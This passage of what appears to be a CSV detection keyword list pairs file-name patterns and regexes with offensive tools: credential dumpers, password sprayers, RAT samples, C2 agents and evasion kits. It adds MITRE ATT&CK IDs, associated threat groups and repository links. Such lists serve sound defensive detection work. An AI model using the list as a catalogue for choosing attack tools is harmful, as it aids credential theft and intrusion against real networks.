"*\operapassview.zip",".{0,1000}\\operapassview\.zip","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - 
TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17050" "*\OperaPassView_lng.ini*",".{0,1000}\\OperaPassView_lng\.ini.{0,1000}","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17051" "*\oracle-patator.py*",".{0,1000}\\oracle\-patator\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","17053" "*\oracle-scanner.py*",".{0,1000}\\oracle\-scanner\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","17054" "*\oracle-tnscmd.py*",".{0,1000}\\oracle\-tnscmd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","17055" "*\OrionRAT.exe*",".{0,1000}\\OrionRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17056" "*\orionserver.exe*",".{0,1000}\\orionserver\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17057" "*\os\windows\pkg\evasion\evasion*",".{0,1000}\\os\\windows\\pkg\\evasion\\evasion.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","17058" "*\oSpray.py*",".{0,1000}\\oSpray\.py.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003 - T1621","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","0","N/A","N/A","10","1","70","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z","17061" 
"*\ouned_smbserver.py*",".{0,1000}\\ouned_smbserver\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","17062" "*\out_pe.exe*",".{0,1000}\\out_pe\.exe.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","17063" "*\OutFileCommand.cs",".{0,1000}\\OutFileCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","17064" "*\Outflank-Recon-AD\*",".{0,1000}\\Outflank\-Recon\-AD\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17065" "*\OutlookEmails.log*",".{0,1000}\\OutlookEmails\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17067" "*\Out-Minidump.ps1*",".{0,1000}\\Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17068" 
"*\Out-Minidump.ps1*",".{0,1000}\\Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","17069" "*\owa_enum_activesync.py*",".{0,1000}\\owa_enum_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17070" "*\owa_spray_activesync.py*",".{0,1000}\\owa_spray_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17071" "*\owa-sprayed-creds.txt*",".{0,1000}\\owa\-sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","17072" "*\owa-valid-users.txt*",".{0,1000}\\owa\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation 
tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","17073" "*\owneredit.py*",".{0,1000}\\owneredit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","17074" "*\OxidResolver.exe*",".{0,1000}\\OxidResolver\.exe.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","N/A","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","17075" "*\p0wnedAmsiBypass.*",".{0,1000}\\p0wnedAmsiBypass\..{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). 
It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","17076" "*\p0wnedExecute.*",".{0,1000}\\p0wnedExecute\..{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","17077" "*\p0wnedInveigh.*",".{0,1000}\\p0wnedInveigh\..{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). 
It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","17078" "*\p0wnedPotato.*",".{0,1000}\\p0wnedPotato\..{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","17079" "*\p0wnedSystem.*",".{0,1000}\\p0wnedSystem\..{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). 
It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","17080" "*\padre\pkg\exploit*",".{0,1000}\\padre\\pkg\\exploit.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","0","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","17081" "*\Pain RAT.exe*",".{0,1000}\\Pain\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17095" "*\paloalto_enum_globalprotectportal.py*",".{0,1000}\\paloalto_enum_globalprotectportal\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential 
Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17096" "*\paloalto_spray_globalprotectportal.py*",".{0,1000}\\paloalto_spray_globalprotectportal\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","17097" "*\pamspy.bpf.c*",".{0,1000}\\pamspy\.bpf\.c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","17098" "*\pamspy_event.h*",".{0,1000}\\pamspy_event\.h.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","17099" "*\Pandora RAT V*.exe*",".{0,1000}\\Pandora\sRAT\sV.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17100" "*\pandora.cpp*",".{0,1000}\\pandora\.cpp.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential 
Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","17101" "*\pandora.sln*",".{0,1000}\\pandora\.sln.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","17102" "*\papacat.ps1*",".{0,1000}\\papacat\.ps1.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","N/A","8","4","309","25","2024-08-21T23:10:08Z","2021-05-11T06:26:10Z","17103" "*\papacat.ps1*",".{0,1000}\\papacat\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17104" "*\papacat.zip*",".{0,1000}\\papacat\.zip.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","N/A","8","4","309","25","2024-08-21T23:10:08Z","2021-05-11T06:26:10Z","17105" "*\Parasite Invoke.csproj*",".{0,1000}\\Parasite\sInvoke\.csproj.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","17106" "*\Parasite Invoke.exe*",".{0,1000}\\Parasite\sInvoke\.exe.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","17107" "*\Parasite Invoke.pdb*",".{0,1000}\\Parasite\sInvoke\.pdb.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","17108" "*\Parasite Invoke.sln*",".{0,1000}\\Parasite\sInvoke\.sln.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","17109" "*\Parasite Invoke\*",".{0,1000}\\Parasite\sInvoke\\.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","17110" "*\Parasite-Invoke-main*",".{0,1000}\\Parasite\-Invoke\-main.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","17111" "*\ParsedMalleableData.txt*",".{0,1000}\\ParsedMalleableData\.txt.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","17112" "*\parsers\nessus.py*",".{0,1000}\\parsers\\nessus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17113" "*\PassSpray.ps1*",".{0,1000}\\PassSpray\.ps1.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","0","N/A","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","17114" "*\PassTheCert.cs*",".{0,1000}\\PassTheCert\.cs.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an 
LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","17115" "*\PassTheCert.exe*",".{0,1000}\\PassTheCert\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","17116" "*\PassTheCert.exe*",".{0,1000}\\PassTheCert\.exe.{0,1000}","offensive_tool_keyword","PassTheCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17117" "*\PassTheCert.exe*",".{0,1000}\\PassTheCert\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17118" "*\PassTheCert.exe*",".{0,1000}\\PassTheCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","17119" "*\PassTheCert.pdb*",".{0,1000}\\PassTheCert\.pdb.{0,1000}","offensive_tool_keyword","PassTheCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17120" "*\PassTheCert.pdb*",".{0,1000}\\PassTheCert\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17121" "*\PassTheCert.sln*",".{0,1000}\\PassTheCert\.sln.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","17122" "*\PassTheChallenge\PassTheChallenge\*",".{0,1000}\\PassTheChallenge\\PassTheChallenge\\.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","17123" "*\passwarden\app\getCredspasswarden.h*",".{0,1000}\\passwarden\\app\\getCredspasswarden\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that 